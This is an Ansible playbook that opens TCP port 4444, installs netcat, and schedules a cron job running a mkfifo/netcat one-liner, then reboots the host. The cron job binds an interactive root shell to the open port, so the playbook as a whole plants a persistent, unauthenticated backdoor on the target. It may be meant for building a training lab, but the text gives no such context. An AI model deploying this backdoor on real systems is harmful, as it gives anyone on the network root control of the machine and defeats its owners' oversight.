---
- hosts: "{{ host }}"
  remote_user: root

- name: Allow traffic on port 4444
  ansible.builtin.import_playbook: ../common/allowTraffic.yml
  vars:
    port_no: "4444"
    proto: tcp

- name: Install netcat
  ansible.builtin.import_playbook: ../common/installPackage.yml
  vars:
    package: netcat

- name: Create netcat listener cron job
  ansible.builtin.import_playbook: ../common/cronJob.yml
  vars:
    job_cmd: "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -lnvp 4444 >/tmp/f"

- name: Reboot machine
  ansible.builtin.import_playbook: ../common/reboot.yml
  vars:
    timeout: 0
